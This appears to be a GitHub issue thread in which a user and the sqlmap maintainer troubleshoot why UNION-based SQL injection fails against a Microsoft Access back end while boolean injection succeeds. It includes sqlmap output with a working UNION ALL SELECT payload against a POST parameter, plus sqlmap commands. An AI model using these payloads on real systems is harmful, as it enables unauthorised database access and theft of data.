Boolean SQLi vs Union SQLi

[aress31]

I have a target vulnerable to both type of SQL injection( Boolean and Union). In a first time, I tried to exploit the boolean SQLi which worked fine (but damn slow since it's based on guessing each char and the table contains more than 70000 entries). Then, I manually found the number of columns for the Union SQLi and tried to exploit it but surprisingly no data can be retrieved at all, not even the common-table/column name.

The target is:

      [13:33:39] [INFO] the back-end DBMS is Microsoft Access
      web server operating system: Windows 2008 R2 or 7
      web application technology: ASP.NET, Microsoft IIS 7.5, ASP
      back-end DBMS: Microsoft Access

I would like to understand why the Boolean SQLi technique works and not the Union (remember that I have been able to find the number of column and that sqlmap find the injection by brute-forcing the columns type). Is the Union SQLi only for In-Band SQLi?

PS: Is it normal to receive the 500 error code when using Union SQLi?

Kind regards, Alexandre

[stamparm]

1) Usage of ORDER BY is not UNION SQL injection 2) I bet that you haven't successfully used UNION SQL injection in the first place. Take a look into 1) 3) UNION SQL injection in MsAccess requires knowledge of at least one readable table name in the database. There is no default here which works always. 4) Find yourself one readable table name then do the 2) 5) You can force the usage of that "readable" table name in sqlmap with option --union-from

[aress31]

More details:

POST parameter 'Email_client' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 575 HTTP(s) requests:
---
Parameter: Email_client (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 33 columns (custom)
    Payload: Email_client=email' UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(106)&CHR(98)&CHR(112)&CHR(113)&CHR(86)&CHR(86)&CHR(110)&CHR(106)&CHR(80)&CHR(90)&CHR(80)&CHR(72)&CHR(88)&CHR(74)&CHR(113)&CHR(118)&CHR(112)&CHR(120)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&oubli_password=Envoyer
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
[14:14:14] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access

I already know 4 table names that I am using with the switch --union-from.

PS: By default sqlmap makes all the query using the table MSysAccessObjects which is I suppose a default system table. :)

Best, Alexandre

[stamparm]

Then this is a false claim: "but surprisingly no data can be retrieved at all, not even the common-table/column name"

[aress31]

No it is not a false claim. I got the table names using the Boolean SQLi which I have been able to successfully exploit.

[stamparm]

And what were the table names if I may ask?

[aress31]

contact is one of the table that I found for example.

[stamparm]

And sqlmap couldn't find it with --common-tables? Can you please send the traffic.txt resulting from:

python sqlmap.py -u .... --flush-session --batch --common-tables -t traffic.txt

to miroslav@sqlmap.org?

[aress31]

Sure thanks.